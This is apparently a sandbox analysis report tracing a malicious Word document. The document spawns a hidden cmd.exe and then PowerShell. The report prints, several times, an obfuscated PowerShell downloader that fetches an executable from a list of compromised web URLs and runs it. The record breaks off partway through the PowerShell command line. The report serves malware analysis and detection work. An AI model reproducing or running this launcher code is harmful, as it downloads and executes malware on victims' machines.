Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:02 (Local Time)	4	Fn
System	Get Cursor	x_out = 959, y_out = 696	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:02 (Local Time)	2	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:02 (Local Time)	1	Fn
System	Get Cursor	x_out = 959, y_out = 696	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:02 (Local Time)	7	Fn
Module	Get Address	module_name = Unknown module name, function = 713, address_out = 0x7fef103a1f4	1	Fn
Module	Get Address	module_name = Unknown module name, function = 601, address_out = 0x7fef103c3e0	1	Fn
Module	Get Address	module_name = Unknown module name, function = 600, address_out = 0x7fef0dbc6fc	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:03 (Local Time)	2	Fn
Module	Get Address	module_name = Unknown module name, function = 632, address_out = 0x7fef0dffe60	1	Fn
Module	Get Address	module_name = Unknown module name, function = 608, address_out = 0x7fef0e0142c	1	Fn
Process	Create	process_name = CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) , os_pid = 0xad0, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
System	Get Cursor	x_out = 959, y_out = 696	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:19:09 (Local Time)	6	Fn

Process #2: cmd.exe

(Host: 88, Network: 0)

Information	Value
ID	#2
File Name	c:\windows\system32\cmd.exe
Command Line	CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) )
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:00:19, Reason: Child Process
Unmonitor	End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration	00:02:04

OS Process Information

Information	Value
PID	0xad0
Parent PID	0x9d4 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x AD4

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000150000	0x00150000	0x0024ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000270000	0x00270000	0x0036ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000370000	0x00370000	0x0046ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000520000	0x00520000	0x0052ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000530000	0x00530000	0x006b7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000006c0000	0x006c0000	0x00840fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000850000	0x00850000	0x01c4ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001c50000	0x01c50000	0x01f92fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01fa0000	0x0226efff	Memory Mapped File	Readable	Region Actions
cmd.exe	0x49f60000	0x49fb8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76e70000	0x76f69fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76f70000	0x7708efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
winbrand.dll	0x7fef5290000	0x7fef5297fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd320000	0x7fefd38afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7fefd490000	0x7fefd49dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefd4a0000	0x7fefd568fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefe300000	0x7fefe32dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefe330000	0x7fefe396fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefebf0000	0x7fefecf8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefef80000	0x7feff01efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feff3b0000	0x7feff3b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffdd000	0x7fffffdd000	0x7fffffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffdf000	0x7fffffdf000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Threads

Thread 0xad4

(Host: 82, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-11-28 18:18:04 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 85301	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49f60000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76f70000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76f86d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\CmD.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Desktop	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76f70000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76f823d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76f78290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76f817e0	1	Fn
Environment	Get Environment String	name = binkOHOTJcSMBkQ	1	Fn
Environment	Get Environment String	name = =EINhmPkdO&&set	1	Fn
Environment	Get Environment String	name = kiqjRiiiH	1	Fn
Environment	Get Environment String	name = =owe^r^s&&set	1	Fn
Environment	Get Environment String	name = zzwpVwCTCRDvTBu	1	Fn
Environment	Get Environment String	name = =pOwoJiQoW&&set	1	Fn
Environment	Get Environment String	name = CdjPuLtXi	1	Fn
Environment	Get Environment String	name = =p&&set	1	Fn
Environment	Get Environment String	name = GKZajcAqFZkRLZw	1	Fn
Environment	Get Environment String	name = =NazJjhVlGSrXQvT&&set	1	Fn
Environment	Get Environment String	name = QiiPPcnDM	1	Fn
Environment	Get Environment String	name = =^he^l^l&&set	1	Fn
Environment	Get Environment String	name = jiIZiKXbkZQMpuQ	1	Fn
Environment	Get Environment String	name = =dipAbiiHEplZSHr&&!	1	Fn
Environment	Get Environment String	name = CdjPuLtXi	1	Fn
Environment	Get Environment String	name = !!	1	Fn
Environment	Get Environment String	name = kiqjRiiiH	1	Fn
Environment	Get Environment String	name = !!	1	Fn
Environment	Get Environment String	name = QiiPPcnDM	1	Fn
Environment	Get Environment String	name = ! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp	1	Fn
Environment	Set Environment String	name = %binkOHOTJcSMBkQ%, value = EINhmPkdO	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = %kiqjRiiiH%, value = owers	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = %zzwpVwCTCRDvTBu%, value = pOwoJiQoW	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = %CdjPuLtXi%, value = p	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = %CdjPuLtXi%, result_out = p	1	Fn
Environment	Get Environment String	name = %kiqjRiiiH%, result_out = owers	1	Fn
Environment	Get Environment String	name = %QiiPPcnDM%, result_out = hell	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xaec, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #3: powershell.exe

(Host: 694, Network: 17)

Information	Value
ID	#3
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	powershell ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in 